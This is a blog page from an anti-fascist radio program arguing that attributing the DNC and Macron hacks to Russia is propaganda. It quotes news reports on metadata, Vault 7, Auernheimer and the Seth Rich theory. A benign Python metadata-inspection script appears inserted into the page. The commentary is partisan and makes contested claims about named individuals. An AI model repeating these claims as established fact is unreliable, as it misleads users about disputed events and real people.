Spitfire List Web site and blog of anti-fascist researcher and radio personality Dave Emory.

For The Record  

FTR #960 Update on the High Profile Hacks


This broadcast was recorded in one, 60-minute segment.

Introduction: As indicated by the title, this broadcast updates the high-profile hacks, at the epicenter of “Russia Gate,” the brutal political fantasy that is at the core of American New Cold War propaganda and that may well lead to World War III.

(Other programs dealing with this subject include: FTR #’s 917, 923, 924, 940, 943, 958, 959.)

As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do. In a world where the verifiably false and physically impossible “controlled demolition”/Truther nonsense has gained traction, cyber false flag ops are all the more threatening and sinister.

Now, we learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significantly, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.

This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.

We then highlight the recent conclusions of the French cyberintelligence chief (Guillaume Poupard) and his warnings about the incredible dangers of cyber-misattribution–the ease with which any random hacker could carry out a spear-phishing attack, and his bafflement at the NSA’s recent attribution of the French election spear-phishing hacks to Russia.

Characteristic of the disingenuous, propagandistic spin of American news media on Putin/Russia/the high profile hacks is a New York Times article that accuses Putin of laying down a propaganda veil to cover for alleged Russian hacking, omitting his remarks that–correctly–note that contemporary technology easily permits the misattribution of cyber espionage/hacking.


Andrew Auernheimer: Guest at Glenn Greenwald’s party; apparent resident of Ukraine; probable author of the phony documents in the Macron hack

We then review the grotesquely dark comic nature of the Macron hacks (supposedly done by “Russian intelligence”.)

Those “Russian government hackers” really need an OPSEC refresher course. The hacked documents in the “Macron hack” not only contained Cyrillic text in the metadata, but also contained the name of the last person to modify the documents. That name, “Roshka Georgiy Petrovichan”, is an employee at Evrika, a large IT company that does work for the Russian government, including the FSB (Russian intelligence).

Also found in the metadata is the email of the person who uploaded the files to “archive.org”, and that email address, frankmacher1@gmx.de, is registered with a German free webmail provider used previously in 2016 phishing attacks against the CDU in Germany that have been attributed to APT28. It would appear that the “Russian hackers” not only left clues suggesting it was Russian hackers behind the hack, but they decided to name names this time–their own names.

In related news, a group of cybersecurity researchers studying the Macron hack has concluded that the modified documents were doctored by someone associated with The Daily Stormer neo-Nazi website and Andrew “the weev” Auernheimer.

Auernheimer was a guest at Glenn Greenwald and Laura Poitras’s party celebrating their receipt of the Polk award.

“. . . ‘We strongly believe that the fake offshore documents were created by someone with control of the Daily Stormer server,’ said Tord Lundström, a computer forensics investigator at Virtualroad.org. . . .”

The public face, site publisher of The Daily Stormer is Andrew Anglin. But look who the site is registered to: Andrew Auernheimer (the site architect) who apparently resided in Ukraine as of the start of this year.

The analysis from the web-security firm Virtualroad.org indicates that someone associated with the Daily Stormer modified those faked documents–very possibly a highly skilled neo-Nazi hacker like “the weev”.

Based on analysis of how the document dump unfolded, it’s looking like the inexplicably self-incriminating “Russian hackers” may have been a bunch of American neo-Nazis. Imagine that.

In FTR #917, we underscored the genesis of the Seth Rich murder conspiracy theory with WikiLeaks and Julian Assange, who was in touch with Roger Stone during the 2016 campaign. (Stone functioned as the unofficial dirty tricks specialist for the Trump campaign, a role he has played–with relish–since Watergate.)

The far-right Seth Rich murder conspiracy theory acquired new gravitas, thanks in part to Kim Schmitz, aka “Kim Dotcom.” We examined Schmitz at length in FTR #812. A synoptic overview of the political and professional orientation of Kim Dotcom is excerpted from that broadcast’s description: “A colleague of Eddie the Friendly Spook [Snowden], Julian Assange and Glenn Greenwald, Kim Schmitz [aka “Kim Dotcom”] espouses the same libertarian/free market ideology underlying the “corporatism” of Benito Mussolini. With an extensive criminal record in Germany and elsewhere, “Der Dotcommandant” has eluded serious punishment for his offenses, including executing the largest insider trading scheme in German history.

Embraced by the file-sharing community and elements of the so-called progressive sector, Dotcom actually allied himself with John Banks and his far-right ACT Party in New Zealand. His embrace of the so-called progressive sector came later and is viewed as having damaged left-leaning parties at the polls. Dotcom is enamored of Nazi memorabilia and owns a rare, author-autographed copy of ‘Mein Kampf.’ . . .”

Program Highlights Include:

  • The dissemination of the Seth Rich disinformation by Fox News and Rush Limbaugh, generated by WikiLeaks, Roger Stone and Kim Dotcom.
  • Kim Dotcom’s tweeting of an admittedly phony document about the Seth Rich BS.
  • Dotcom’s refusal to retract his tweet of the phony document.
  • Review of the Shadow Brokers non-hack of the NSA.
  • Review of the Shadow Brokers use of white supremacist propaganda.
  • Review of the role of Crowdstrike’s Dimitri Alperovitch in the dissemination of the “Russia did it” propaganda.
  • Review of the role of Ukrainian fascist Alexandra Chalupa in the dissemination of the “Russia did it” propaganda.

1a. As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do. In a world where the verifiably false and physically impossible “controlled demolition”/Truther nonsense has gained traction, cyber false flag ops are all the more threatening and sinister.

Now, we learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significantly, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.

This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.

“WikiLeaks Vault 7 Part 3 Reveals CIA Tool Might Mask Hacks as Russian, Chinese, Arabic” by Stephanie Dube Dwilson; Heavy; 4/3/2017.

This morning, WikiLeaks released part 3 of its Vault 7 series, called Marble. Marble reveals CIA source code files along with decoy languages that might disguise viruses, trojans, and hacking attacks. These tools could make it more difficult for anti-virus companies and forensic investigators to attribute hacks to the CIA. Could this call the source of previous hacks into question? It appears that yes, this might be used to disguise the CIA’s own hacks to appear as if they were Russian, Chinese, or from specific other countries. These tools were in use in 2016, WikiLeaks reported.

 It’s not known exactly how this Marble tool was actually used. However, according to WikiLeaks, the tool could make it more difficult for investigators and anti-virus companies to attribute viruses and other hacking tools to the CIA. Test examples weren’t just in English, but also Russian, Chinese, Korean, Arabic, and Farsi. This might allow a malware creator to not only look like they were speaking in Russian or Chinese, rather than in English, but to also look like they tried to hide that they were not speaking English, according to WikiLeaks. This might also hide fake error messages or be used for other purposes. . . .

1b. We then review the recent conclusions of the French cyberintelligence chief and his warnings about the incredible dangers of cyber-misattribution–the ease with which any random hacker could carry out a spear-phishing attack, and his bafflement at the NSA’s recent attribution of the French election spear-phishing hacks to Russia.

“French Security Chief Warns of Risk for ‘Permanent War’ in Cyberspace”; CBS News; 06/02/2017

Cyberspace faces an approaching risk of “permanent war” between states and criminal or extremist organizations because of increasingly destructive hacking attacks, the head of the French government’s cybersecurity agency warned Thursday.

In a wide-ranging interview in his office with The Associated Press, Guillaume Poupard lamented a lack of commonly agreed rules to govern cyberspace and said: “We must work collectively, not just with two or three Western countries, but on a global scale.”

“With what we see today – attacks that are criminal, from states, often for espionage or fraud but also more and more for sabotage or destruction – we are getting closer, clearly, to a state of war, a state of war that could be more complicated, probably, than those we’ve known until now,” he said.

His comments echoed testimony from the head of the U.S. National Security Agency, Adm. Michael Rogers, to the Senate Armed Services Committee on May 9. Rogers spoke of “cyber effects” being used by states “to maintain the initiative just short of war” and said: “‘Cyber war’ is not some future concept or cinematic spectacle, it is real and here to stay.”

Poupard said “the most nightmare scenario, the point of view that Rogers expressed and which I share” would be “a sort of permanent war — between states, between states and other organizations, which can be criminal and terrorist organizations — where everyone will attack each other, without really knowing who did what. A sort of generalized chaos that could affect all of cyberspace.”

Poupard is director general of the government cyber-defense agency known in France by its acronym, ANSSI. Its agents were immediately called to deal with the aftermath of a hack and massive document leak that hit the election campaign of President Emmanuel Macron just two days before his May 7 victory.

Macron’s political movement said the unidentified hackers accessed staffers’ personal and professional emails and leaked campaign finance material and contracts — as well as fake decoy documents — online.

Contrary to Rogers, who said the U.S. warned France of “Russian activity” before Macron’s win, Poupard didn’t point the finger at Russia. He told the AP that ANSSI’s investigation found no trace behind the Macron hack of the notorious hacking group APT28 — identified by the U.S. government as a Russian intelligence outfit and blamed for hacks of the U.S. election campaign, anti-doping agencies and other targets. The group also is known by other names, including “Fancy Bear.”

Poupard described the Macron campaign hack as “not very technological” and said: “The attack was so generic and simple that it could have been practically anyone.”

Without ruling out the possibility that a state might have been involved, he said the attack’s simplicity “means that we can imagine that it was a person who did this alone. They could be in any country.”

“It really could be anyone. It could even be an isolated individual,” he said.

Poupard contrasted the “Macron Leaks” hack with another far more sophisticated attack that took French broadcaster TV5 Monde off the air in 2015. There, “very specific tools were used to destroy the equipment” in the attack that “resembles a lot what we call collectively APT28,” he said.

“To say ‘Macron Leaks’ was APT28, I’m absolutely incapable today of doing that,” he said. “I have absolutely no element to say whether it is true or false.”

Rogers, the NSA director, said in his Senate Armed Services hearing that U.S. authorities gave their French counterparts “a heads-up” before the Macron documents leaked that: “‘We are watching the Russians. We are seeing them penetrate some of your infrastructure. Here is what we have seen. What can we do to try to assist?’”

Poupard said Rogers’ comments left him perplexed and that the French had long been on alert about potential threats to their presidential election.

“Why did Admiral Rogers say that, like that, at that time? It really surprised me. It really surprised my European allies. And to be totally frank, when I spoke about it to my NSA counterparts and asked why did he say that, they didn’t really know how to reply either,” he said. “Perhaps he went further than what he really wanted to say.”

Still, Poupard said the attack highlighted the cyber-threat to democratic processes. “Unfortunately, we now know the reality that we are going to live with forever, probably,” he said.

The attack on TV5 was a rare public example. In 2016, others targeted government administrations and big companies quoted on the benchmark French stock market index, the CAC-40, he said.

Pointing fingers at suspected authors is fraught with risk, because sophisticated attackers can mask their activities with false trails, he said.

“We suffered attacks that were attributed to China, that we think came from China. Among them, some came from China. China is big, I don’t know if it was the state, criminals,” he said. “What I am certain of is that among these attacks, some strangely resembled Chinese attacks but in fact didn’t come from China.”

“If you start to accuse one country when in fact it was another country … we’ll get international chaos,” he said. “We’ll get what we all fear, which is to say a sort of permanent conflict where everyone is attacking everyone else.”

1c. Mr. Poupard denied the NSA/U.S. assertion that APT28 aka “Cozy Bear/Fancy Bear/Russia” hacked the French election.

“French Cyber Security Leader: No Trace of Russian Hacking Group in Emmanuel Macron Campaign Leaks”; Associated Press; 06/01/2017

The head of the French government’s cyber security agency, which investigated leaks from President Emmanuel Macron’s election campaign, says they found no trace of a notorious Russian hacking group behind the attack.

In an interview in his office Thursday with The Associated Press, Guillaume Poupard said the Macron campaign hack “was so generic and simple that it could have been practically anyone.”

He said they found no trace that the Russian hacking group known as APT28, blamed for other attacks including on the U.S. presidential campaign, was responsible.

Poupard is director general of the government cyber-defense agency known in France by its acronym, ANSSI. Its experts were immediately dispatched when documents stolen from the Macron campaign leaked online on May 5 in the closing hours of the presidential race.

Poupard says the attack’s simplicity “means that we can imagine that it was a person who did this alone. They could be in any country.”

2. A New York Times article by Andrew Higgins (one of the more flagrantly propagandizing NYT writers vis-à-vis Russia/Ukraine) spins Vladimir Putin’s comments about Russian hacking. The Times portrayed his comments as “giving an out” to the nonsense about Russia hacking U.S. elections. What the Times eclipsed (along with other U.S. media) was the conclusion of Putin’s comments: he noted that hacking is very easily disguised and misrepresented.

“Maybe Private Russian Hackers Meddled in Election, Putin Says” by Andrew Higgins; The New York Times; 06/01/2017

. . . . An expert at muddying the waters and creating confusion, Mr. Putin advanced a number of alternative theories that could help Moscow address any firm evidence that might emerge as a trail leading to Russia.

Stating that modern technology can easily be manipulated to create a false trail, he said, “I can imagine that someone is doing this purposefully — building the chain of attacks so that the territory of the Russian Federation appears to be the source of that attack.” He added, “Modern technologies allow to do that kind of thing; it’s rather easy to do.”

Mr. Putin appeared to be repeating an argument he first made earlier in the week in an interview with the French newspaper Le Figaro.

“I think that he was totally right when he said it could have been someone sitting on their bed or somebody intentionally inserted a flash drive with the name of a Russian national, or something like that,” Mr. Putin told the French newspaper, referring to Mr. Trump. “Anything is possible in this virtual world. Russia never engages in activities of this kind, and we do not need it. It makes no sense for us to do such things. What for?” . . .

3. Those “Russian government hackers” really need an OPSEC refresher course. The hacked documents in the “Macron hack” not only contained Cyrillic text in the metadata, but also contained the name of the last person to modify the documents. And that name, “Roshka Georgiy Petrovichan”, is an employee at Evrika, a large IT company that does work for the Russian government, including the FSB.

Also found in the metadata is the email of the person who uploaded the files to “archive.org”, and that email address, frankmacher1@gmx.de, is registered with a German free webmail provider used previously in 2016 phishing attacks against the CDU in Germany that have been attributed to APT28. It would appear that the ‘Russian hackers’ not only left clues suggesting it was Russian hackers behind the hack, but they decided to name names this time–their own names.

Not surprisingly, given the fascist nature of WikiLeaks, they concluded that Russia was behind the hacks. (For more on the fascist nature of WikiLeaks, see FTR #’s 724, 725, 732, 745, 755, 917.)

“Evidence Suggests Russia Behind Hack of French President-Elect” by Sean Gallagher; Ars Technica; 5/8/2017.

Russian security firms’ metadata found in files, according to WikiLeaks and others.

Late on May 5 as the two final candidates for the French presidency were about to enter a press blackout in advance of the May 7 election, nine gigabytes of data allegedly from the campaign of Emmanuel Macron were posted on the Internet in torrents and archives. The files, which were initially distributed via links posted on 4Chan and then by WikiLeaks, had forensic metadata suggesting that Russians were behind the breach—and that a Russian government contract employee may have falsified some of the dumped documents.

Even WikiLeaks, which initially publicized the breach and defended its integrity on the organization’s Twitter account, has since acknowledged that some of the metadata pointed directly to a Russian company with ties to the government:

“#MacronLeaks: name of employee for Russian govt security contractor Evrika appears 9 times in metadata for “xls_cendric.rar” leak archive” (pic.twitter.com/jyhlmldlbL) — WikiLeaks (@wikileaks), May 6, 2017

Evrika (“Eureka”) ZAO is a large information technology company in St. Petersburg that does some work for the Russian government, and the group includes the Federal Security Service of the Russian Federation (FSB) among its acknowledged customers (as noted in this job listing). The company is a systems integrator, and it builds its own computer equipment and provides “integrated information security systems.” The metadata in some Microsoft Office files shows the last person to have edited the files to be “Roshka Georgiy Petrovich,” a current or former Evrika ZAO employee.

According to a Trend Micro report on April 25, the Macron campaign was targeted by the Pawn Storm threat group (also known as “Fancy Bear” or APT28) in a March 15 “phishing” campaign using the domain onedrive-en-marche.fr. The domain was registered by a “Johny Pinch” using a Mail.com webmail address. The same threat group’s infrastructure and malware was found to be used in the breach of the Democratic National Committee in 2016, in the phishing attack targeting members of the presidential campaign of former Secretary of State Hillary Clinton, and in a number of other campaigns against political targets in the US and Germany over the past year.

The metadata attached to the upload of the Macron files also includes some identifying data with an e-mail address for the person uploading the content to archive.org:

“Well this is fun” (pic.twitter.com/oXsH83snCS) — Pwn All The Things (@pwnallthethings), May 6, 2017

The e-mail address of the uploader, frankmacher1@gmx.de, is registered with a German free webmail provider used previously in 2016 Pawn Storm / APT28 phishing attacks against the Christian Democratic Union, German Chancellor Angela Merkel’s political party.

The involvement of APT28, the editing of some documents leaked by someone using a Russian version of Microsoft Office, and the attempt to spread the data through amplification in social media channels such as 4Chan, Twitter, and Facebook—where a number of new accounts posted links to the data—are all characteristics of the information operations seen during the 2016 US presidential campaign.
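The metadata fields cited above (the “last modified by” name in Office files) live in the docProps/core.xml part of an OOXML package. The script below is an added illustration, not code from the Ars Technica article or this site: it builds a constructed sample .docx archive in memory, extracts those core-properties fields, and flags Cyrillic characters in them, while treating them as the user-controlled, editable values they are, which is why they support a lead rather than an attribution. The sample author names and timestamp are constructed and are not taken from the leaked files.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# XML namespaces used by docProps/core.xml in OOXML packages (docx/xlsx/pptx).
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

# Basic Cyrillic block; enough to flag names written in Russian script.
CYRILLIC = re.compile(r"[\u0400-\u04FF]")


def build_sample_docx(creator, last_modified_by, include_core=True):
    """Construct a minimal OOXML-style zip in memory (constructed sample,
    not a real leaked file). Only the parts needed for metadata inspection
    are written; the document body is a placeholder."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="{cp}" xmlns:dc="{dc}" xmlns:dcterms="{dcterms}">'
        "<dc:creator>{creator}</dc:creator>"
        "<cp:lastModifiedBy>{lmb}</cp:lastModifiedBy>"
        "<dcterms:modified>2017-05-05T20:00:00Z</dcterms:modified>"
        "</cp:coreProperties>"
    ).format(creator=creator, lmb=last_modified_by, **NS)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        if include_core:
            z.writestr("docProps/core.xml", core)
        z.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


def extract_core_properties(docx_bytes):
    """Return the core-properties fields an investigator reads first.
    Returns an empty dict when the package carries no core.xml part."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "docProps/core.xml" not in z.namelist():
            return {}
        root = ET.fromstring(z.read("docProps/core.xml"))
    wanted = (
        ("dc:creator", "creator"),
        ("cp:lastModifiedBy", "last_modified_by"),
        ("dcterms:modified", "modified"),
        ("dc:language", "language"),
    )
    fields = {}
    for tag, key in wanted:
        el = root.find(tag, NS)
        if el is not None and el.text:
            fields[key] = el.text
    return fields


def attribution_signals(fields):
    """Flag fields containing Cyrillic script. These values are written by the
    editing application from user-controlled settings, so a hit is a lead to
    corroborate with other evidence, not proof of who produced the file."""
    return {key: bool(CYRILLIC.search(val)) for key, val in fields.items()}


if __name__ == "__main__":
    sample = build_sample_docx("sample-author", "Тест Пользователь")
    props = extract_core_properties(sample)
    for key, value in props.items():
        print(f"{key}: {value}")
    print("cyrillic:", attribution_signals(props))
```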


Andrew Auernheimer aka “Weev”: Guest at Glenn Greenwald’s party

4. In related news, a group of cybersecurity researchers studying the Macron hack has concluded that the modified documents were doctored by someone associated with The Daily Stormer neo-Nazi website and Andrew “the weev” Auernheimer.

Auernheimer was a guest at Glenn Greenwald and Laura Poitras’s party celebrating their receipt of the Polk award.

“. . . ‘We strongly believe that the fake offshore documents were created by someone with control of the Daily Stormer server,’ said Tord Lundström, a computer forensics investigator at Virtualroad.org. . . .”

Who is in control of the Daily Stormer? Well, its public face and publisher is Andrew Anglin. But look who the site is registered to: Andrew Auernheimer, who apparently resided in Ukraine as of the start of this year:

The analysis from the web-security firm Virtualroad.org indicates that someone associated with the Daily Stormer modified those faked documents. Like, perhaps, a highly skilled neo-Nazi hacker like “the weev”.

Based on an analysis of how the document dump unfolded, it’s looking like the inexplicably self-incriminating ‘Russian hackers’ may have been a bunch of American neo-Nazis. Imagine that.

“U.S. Hacker Linked to Fake Macron Documents, Says Cybersecurity Firm” by David Gauthier-Villars; The Wall Street Journal; 5/16/2017.

Ties between an American’s neo-Nazi website and an internet campaign to smear Macron before French election are found

A group of cybersecurity experts has unearthed ties between an American hacker who maintains a neo-Nazi website and an internet campaign to smear Emmanuel Macron days before he was elected president of France.

Shortly after an anonymous user of the 4chan.org discussion forum posted fake documents purporting to show Mr. Macron had set up an undisclosed shell company in the Caribbean, the user directed people to visit nouveaumartel.com for updates on the French election.

That website, according to research by web-security provider Virtualroad.org, is registered by “Weevlos,” a known online alias of Andrew Auernheimer, an American hacker who gained notoriety three years ago when a U.S. appeals court vacated his conviction for computer fraud. The site also is hosted by a server in Latvia that hosts the Daily Stormer, a neo-Nazi news site that identifies its administrator as “Weev,” another online alias of Mr. Auernheimer, Virtualroad.org says.

“We strongly believe that the fake offshore documents were created by someone with control of the Daily Stormer server,” said Tord Lundström, a computer forensics investigator at Virtualroad.org.

Through Tor Ekeland, the lawyer who represented him in the computer-fraud case in the U.S., Mr. Auernheimer said he “doesn’t have anything to say.”

A French security official said a probe into the fake documents was looking into the role of far-right and neo-Nazi groups but declined to comment on the alleged role of Mr. Auernheimer.

In the run-up to the French election, cybersecurity agencies warned Mr. Macron’s aides that Russian hackers were targeting his presidential campaign, according to people familiar with the matter. On May 5, nine gigabytes of campaign documents and emails were dumped on the internet. The Macron campaign and French authorities have stopped short of pinning blame for the hack on the Kremlin.

Intelligence and cybersecurity investigators examining the flurry of social-media activity leading up to the hack followed a trail of computer code they say leads back to the American far-right.

Contacted by email over the weekend, the publisher of the Daily Stormer, Andrew Anglin, said he and Mr. Auernheimer had used their news site to write about the fake documents because “We follow 4chan closely and have a more modern editorial process than most sites.”

When asked if he or Mr. Auernheimer were behind the fake documents, Mr. Anglin stopped replying.

Mr. Auernheimer was sentenced to 41 months in prison by a U.S. court in late 2012 for obtaining the personal data of thousands of iPad users through an AT&T website. In April 2014, an appeals court vacated his conviction on the grounds that the venue of the trial, in New Jersey, was improper.

Asked if Mr. Auernheimer resided in Ukraine, as a January post on a personal blog indicates, his lawyer said: “I think this is about right.”

The day after the data dump, French security officials summoned their U.S. counterparts stationed in Paris to formally request a probe of the role American far-right websites might have played in disseminating the stolen data, according to a Western security official. A U.S. security official had no comment.

Mounir Mahjoubi, who was in charge of computer security for Mr. Macron’s campaign said far-right groups, or “an international collective of conservatives,” may have coordinated to disrupt the French election.

“We will take time to do analysis, to deconstruct who really runs these groups,” Mr. Mahjoubi told French radio last week. He couldn’t be reached for comment.

French prosecutors have launched formal probes into both the fake documents and the data dump.

The phony documents intended to smear Mr. Macron were posted to 4chan.org twice by an anonymous user, first on May 3 and again on May 5 using higher-resolution files.

Soon after the second post, several 4chan.org users in the same online conversation below the post appeared to congratulate Mr. Auernheimer.

“Weev… you’re doing the lord’s work,” wrote one of the anonymous users.


5. The far-right Seth Rich murder conspiracy theory acquired new gravitas, thanks in part to Kim Schmitz, aka “Kim Dotcom.” We examined Schmitz at length in FTR #812. A synoptic overview of the political and professional orientation of Kim Dotcom is excerpted from that broadcast’s description: “A colleague of Eddie the Friendly Spook [Snowden], Julian Assange and Glenn Greenwald, Kim Schmitz [aka “Kim Dotcom”] espouses the same libertarian/free market ideology underlying the “corporatism” of Benito Mussolini. With an extensive criminal record in Germany and elsewhere, “Der Dotcommandant” has eluded serious punishment for his offenses, including executing the largest insider trading scheme in German history.

Embraced by the file-sharing community and elements of the so-called progressive sector, Dotcom actually allied himself with John Banks and his far-right ACT Party in New Zealand. His embrace of the so-called progressive sector came later and is viewed as having damaged left-leaning parties at the polls. Dotcom is enamored of Nazi memorabilia and owns a rare, author-autographed copy of ‘Mein Kampf.’ . . .”

6. Right-wing media is going to keep biting on Dotcom’s nuggets of ‘testimony’, given its seemingly insatiable appetite for this storyline already and its long-held appetite for seemingly any storyline that promotes the ‘Clinton Body Count’ narrative and portrays Hillary as ‘Killary’.

“The Bonkers Seth Rich Conspiracy Theory, Explained” by Jeff Guo; Vox; 05/24/2017

The life of Seth Rich, a 27-year-old Democratic National Committee staffer, ended nearly a year ago when he was shot to death near his house in Washington, DC. Then came the tragic and bizarre afterlife: Since July, Rich has been the focus of intense right-wing conspiracy theories that have only escalated as the Trump administration’s scandals have deepened.

As the police have repeatedly stated, there is no evidence that Rich’s death was anything other than the consequence of a botched robbery. But some people, especially on the right, believe Rich was murdered by the Clintons for knowing too much about something. The most recent theories claim that Rich, not the Russians, was responsible for leaking the emails, published in WikiLeaks, that revealed Democratic party leaders had talked disparagingly about Bernie Sanders.

Thanks to an erroneous Fox News story last week, which was finally retracted on Tuesday, Rich recently became the focus of an intense media blitz from conservative outlets — many of which were eager for something to talk about besides the scandals swirling around Donald Trump.

Fox News’s Sean Hannity was one of the most enthusiastic rumormongers, devoting segments on three separate occasions last week to Rich. Even after Fox News retracted its story, Hannity promised he would continue to investigate. “I retracted nothing,” he said defiantly on his radio show Tuesday.

Rich’s family has been begging right-wing news outlets to stop spreading unfounded rumors about him, but by now the situation seems to have gotten out of control.

In death, Rich has become a martyr to the right, buoyed by a host of characters each with their own ulterior motives: There is WikiLeaks founder Julian Assange, who wants to downplay the connections between WikiLeaks and the Russians; there are the Clinton haters, who want to spread the idea that the Clintons are murderers; there are the Trump supporters, who want to minimize the idea that Russian hackers helped deliver the election to their candidate; and there are the talking heads on Fox News, who last week needed something other than negative Trump stories to make conversation about.

We might not know who killed Seth Rich, but we do know who turned his legacy into a textbook study of where fake news comes from, how it spreads, and the victims it creates.

Seth Rich was murdered in a senseless act of violence

Seth Rich worked in Democratic politics for most of his career. He grew up and went to college in Omaha, Nebraska, where as a student he volunteered on two Democratic Senate campaigns. After graduating, he moved to Washington, DC, for a job at Greenberg Quinlan Rosner, a progressive opinion research and consulting firm. He was later hired by the Democratic National Committee, where he worked on a project to help people find where to vote.

On Sunday, July 10, Rich was shot to death about a block from where he lived in the Bloomingdale neighborhood of DC. Gunshot detection microphones place the time of the shooting at around 4:20 am. Rich had last been seen at around 1:30 am leaving Lou’s City Bar in Columbia Heights, about a 40-minute walk from where he lived.

It is unclear exactly what happened during those three intervening hours. The Washington Post reported that, according to his parents, cellphone records show that Rich called his girlfriend at 2:05 am and talked to her for more than two hours. He hung up just minutes before he was shot.

The police found Rich on the sidewalk with multiple gunshot wounds, at least two in the back. He still had his watch, his cellphone, and his wallet. There were signs of a struggle: bruises on his hands, knees, and face, and a torn wristwatch strap. According to the police report, he was still “conscious and breathing.” Family members say they were told that Rich was “very talkative,” though it is not publicly known if he was able to describe his assailant or assailants. Rich died a few hours later in the hospital.

The police suspected Rich had been the victim of an attempted robbery. Bloomingdale is a gentrifying part of Washington that still suffers from violent crime. In 2016, there were 24 reported robberies with a gun that occurred within a quarter-mile of the street corner where Rich was shot.

The first conspiracy theories grew out of the “Clinton body count” rumor

Almost immediately after news of Rich’s death, conspiracy theories began circulating on social media. A few factors helped make Rich a target of speculation:

* The murderers left behind Rich’s valuables. (Though, by that same paranoid logic, wouldn’t a professional hitman have taken Rich’s wallet and phone in order to make it look like a regular mugging?)
* Rich worked at the DNC, where in December there had been a minor scandal involving a software glitch that allowed the Bernie Sanders campaign to access private voter data collected by the Clinton campaign.
* Hillary Clinton had just clinched the nomination after a surprisingly bruising primary, and there were still sore feelings in the air.
* There’s a long-running conspiracy theory that the Clintons have assassinated dozens of their political enemies.

If those facts don’t seem to add up to a coherent story, well, you’re thinking too hard. Conspiracy theories don’t operate logically. They start from an assumption — for instance, “the Clintons are shady” — and spiral outward in search of corroboration.

On Reddit, for instance, one user wrote a 1,400-word post listing things that he found “suspicious.” Here were some of the stray facts the redditor claimed were evidence of a hit job by the DNC or the Clintons:

* Rich’s former employer, Greenberg Quinlan Rosner, once did some consulting work for British Petroleum. (“Is it possible that Mr. Rich was aware of the public’s disdain for oil industry/fracking?”)
* Rich once worked on Ben Nelson’s campaign for senator. (“[Nelson] contributed a crucial vote to help pass Obamacare back in 2009.”)
* The political conventions were coming up. (“The TIMING of this tragedy seems too ‘coincidental’”)

It’s unclear what any of these facts have to do with the Clintons, but somehow the Reddit user concluded: “given his position & timing in politics, I believe Seth Rich was murdered by corrupt politicians for knowing too much information on election fraud.”

Others on Twitter and the trolling website 4chan also speculated that Rich might have crossed the Clintons in some way. Rich’s death seemed to fit in with the “Clinton body count” theory, which dates to the 1990s and claims that the Clintons are so vindictive that they hire hitmen to murder people they don’t like.

People who believe the Clintons are murderers often point to deputy White House counsel Vince Foster, who suffered from clinical depression and died of a gunshot wound to the mouth in 1993. Several investigations all ruled Foster’s death a suicide, but some conservatives insisted there must have been foul play. They claimed that Foster, who was looking into the Clintons’ taxes, may have uncovered evidence of corruption in connection to the Whitewater controversy, a guilt-by-association scandal involving friends of the Clintons’.

The “Clinton body count” theory has endured over the years simply because people don’t live forever. Any time someone dies who was connected to the Clintons — and since Bill Clinton was the president of the United States, literally thousands of people were in his orbit — this theory is dredged up again by the tinfoil hat crowd. And then it slowly fades.

At first it seemed the speculation about Seth Rich would die down quickly as well. But then 12 days later, on July 22, WikiLeaks published thousands of private emails from the DNC, and Rich became a politically useful distraction.

Julian Assange and WikiLeaks supercharged the Seth Rich rumors

A month before Rich was murdered, the DNC admitted that Russian hackers had broken into its computer network, gaining access to all of the DNC’s emails. The thought of Russian interference in American politics was infuriating to Rich, according to one person “who was very close” to him, the Washington Post reported: “It was crazy. Especially for Seth. He said, ‘Oh, my God. We have a foreign entity trying to get involved in our elections?’ That made him so angry.”

When WikiLeaks released its dump of DNC emails on July 22, the obvious explanation was that it had obtained those emails from the Russian hackers. This connection was later confirmed by top US intelligence agencies, who concluded “with high confidence” that DNC servers were hacked by top Russian government hackers, who had then given the emails to WikiLeaks. “Moscow most likely chose WikiLeaks because of its self-proclaimed reputation for authenticity,” the US intelligence report explained, as well as for its connection to the Russian propaganda outlet Russia Today.

But WikiLeaks has repeatedly denied its ties to Russia, and ever since last summer it has used Seth Rich as a way to distract from claims that it abetted Russian interference in the US election. WikiLeaks founder Julian Assange had his own reasons to fear a Clinton presidency — as secretary of state, Clinton wanted to indict Assange for his involvement in releasing the millions of US diplomatic cables leaked by Chelsea Manning.

On Dutch television in August 2016, Assange hinted that Rich, not Russia, may have been the source for the WikiLeaks emails. “Whistleblowers go to significant efforts to get us material, and often very significant risks,” he said. “As a 27-year-old, works for the DNC, was shot in the back, murdered just a few weeks ago for unknown reasons as he was walking down the street in Washington.”

“Was he one of your sources then?” the anchor asked.

“We don’t comment on who our sources are,” Assange replied.

“Then why make the suggestion about a young guy being shot in the streets of Washington?” the anchor replied.

Pressed repeatedly for clarification, Assange concluded that “others, others have suggested that. We’re investigating to understand what happened in that situation with Seth Rich. I think it’s a concerning situation; there’s not a conclusion yet.”

As part of its “investigation,” WikiLeaks offered a $20,000 prize in August for information about Rich’s murder.

This is the point where Seth Rich became a prop in a game of international espionage.

Trump supporters and the alt-right amplified the theory that Rich was some kind of Democratic whistleblower or leaker, even though the facts didn’t really fit this pattern. He didn’t have access to the DNC emails, and he had never shown any prowess at hacking — being a data analyst involves a very different set of skills. Besides, the DNC wasn’t the only organization that was hacked: Clinton campaign chair John Podesta’s personal emails, for instance, were stolen separately, as were the emails at the Democratic Congressional Campaign Committee.

